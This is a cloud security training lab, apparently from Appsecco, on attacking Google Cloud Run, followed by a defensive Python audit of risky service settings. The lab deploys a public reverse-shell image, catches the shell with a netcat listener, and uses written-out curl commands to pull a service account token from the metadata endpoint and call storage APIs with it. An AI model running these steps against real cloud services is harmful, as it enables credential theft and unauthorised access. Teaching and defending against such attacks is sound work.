# Attacking Google Cloud Run

Cloud Run is a managed compute platform that enables you to run containers that are invocable via requests or events. You can deploy Cloud Run containers via public container image repositories or via the Google Container/Artifact Registry service.

## What are we going to cover?

In this chapter we will launch a Cloud Run instance using a public container image repository. We will get a reverse shell within the container and explore the environment to see what we can use to hack beyond the Cloud Run environment.

## Steps to attack

### Launching a container to get a reverse shell

1. Log in to your Google Cloud console and navigate to the Cloud Run service here - <https://console.cloud.google.com/run>
2. Click on `Create Service`
3. Select `Deploy one revision from an existing container image`
4. In the `Container Image URL` textbox, enter `gcr.io/cloudsecurity-training/revshell:1.0`. This is an image that belongs to Appsecco and has been made public for this exercise.
5. Enter `revshell` as the Service Name
6. Under `Ingress`, select `Allow all traffic`
7. Under Authentication, select `Allow unauthenticated invocations` and click on `Create`.

Once the container is deployed, the console displays a URL for the app inside the container. The app invokes a reverse shell when a client connects to that URL.

### Catching the reverse shell

We will use the AWS attacker machine to catch the reverse shell.

1. Open TCP port 4242 on the attacker machine using iptables - `sudo iptables -I INPUT -p tcp -m tcp --dport 4242 -j ACCEPT`
2. On the attacker machine, start a netcat listener using `nc -nlvp 4242`
3. Open TCP port 4242 on the AWS Security Group for the attacker machine so that the Cloud Run instance in Google Cloud can connect to the AWS EC2 instance
4. In a new browser window, navigate to the Cloud Run app and pass the IP of the attacker machine via a GET parameter called `ip`.

```
Example: https://revshell-sample-url.run.app/?ip=<attacker-ip>
```

You will receive a reverse shell from your Cloud Run instance on your attacker machine.

### Exploring the environment

You can explore the environment by running the following commands:

1. Get current environment variables (potential place for secrets) - `env`
2. File system exploration. Change to different directories and list their contents - `ls -ltra`
3. Interact with the Google Instance metadata endpoint - `curl http://metadata.google.internal/computeMetadata`

**1. Identify the project name**

```
curl -sLH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/project-id
```

**2. Identify the scope of the attached service account**

```
curl -sLH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
```

**3. Extract the token itself for other attacks**

```
curl -sLH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

**4. Add the token to the attacker machine environment**

In another terminal within the attacker machine, run

```
export TOKEN=<VALUE-OF-TOKEN>
```

**5. Access other areas of the Google Cloud Platform**

Run these commands from the same terminal window where the previous `export` command was run

```
curl -sLH "Authorization: Bearer $TOKEN" https://openidconnect.googleapis.com/v1/userinfo
curl -sLH "Authorization: Bearer $TOKEN" "https://storage.googleapis.com/storage/v1/b?project=<PROJECT-NAME>"
```

Read the API documentation at this URL and identify how you can list objects within individual buckets - <https://cloud.google.com/storage/docs/json_api/v1/objects/list>
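Seen from the defender's side, the lab works because of three settings: ingress open to all traffic, unauthenticated invocation, and a service account token that any code in the container can fetch from the metadata endpoint. The following added example (not part of the original lab) audits a service for them, assuming JSON exported with `gcloud run services describe --format=json` and `gcloud run services get-iam-policy --format=json`; the sample documents and finding names are constructed for illustration.

```python
import json
import re

# Constructed sample documents, shaped like the JSON printed by
# `gcloud run services describe --format=json` and
# `gcloud run services get-iam-policy --format=json`. Values are made up.
SERVICE_JSON = """
{"metadata": {"name": "revshell",
              "annotations": {"run.googleapis.com/ingress": "all"}},
 "spec": {"template": {"spec": {
     "serviceAccountName": "123456789012-compute@developer.gserviceaccount.com",
     "containers": [{"image": "gcr.io/cloudsecurity-training/revshell:1.0"}]}}}}
"""
POLICY_JSON = """
{"bindings": [{"role": "roles/run.invoker", "members": ["allUsers"]}]}
"""

PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}
# Naming pattern of the Compute Engine default service account.
DEFAULT_SA = re.compile(r"^\d+-compute@developer\.gserviceaccount\.com$")


def audit_service(service: dict, policy: dict) -> list[str]:
    """Return findings for the settings that make the lab scenario possible."""
    findings = []
    annotations = service.get("metadata", {}).get("annotations", {})
    # Ingress is treated as "all" when the annotation is absent.
    if annotations.get("run.googleapis.com/ingress", "all") == "all":
        findings.append("ingress-all")
    # "Allow unauthenticated invocations" shows up as a public run.invoker binding.
    for binding in policy.get("bindings", []):
        members = set(binding.get("members", []))
        if binding.get("role") == "roles/run.invoker" and PUBLIC_MEMBERS & members:
            findings.append("public-invoker")
            break
    revision = service.get("spec", {}).get("template", {}).get("spec", {})
    sa = revision.get("serviceAccountName", "")
    # No dedicated identity means the Compute Engine default service account,
    # whose token the metadata endpoint hands to code in the container.
    if not sa or DEFAULT_SA.match(sa):
        findings.append("default-service-account")
    return findings


if __name__ == "__main__":
    for finding in audit_service(json.loads(SERVICE_JSON), json.loads(POLICY_JSON)):
        print(finding)
```

A service that reports `default-service-account` is the case where the token from step 3 carries whatever roles that shared account holds in the project; a dedicated service account with only the roles the service needs limits what step 5 can reach.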

## Additional references

* [Google Cloud Service Accounts](https://cloud.google.com/iam/docs/service-accounts)
* [Using OAuth 2.0 for Server to Server Applications](https://developers.google.com/identity/protocols/oauth2/service-account)

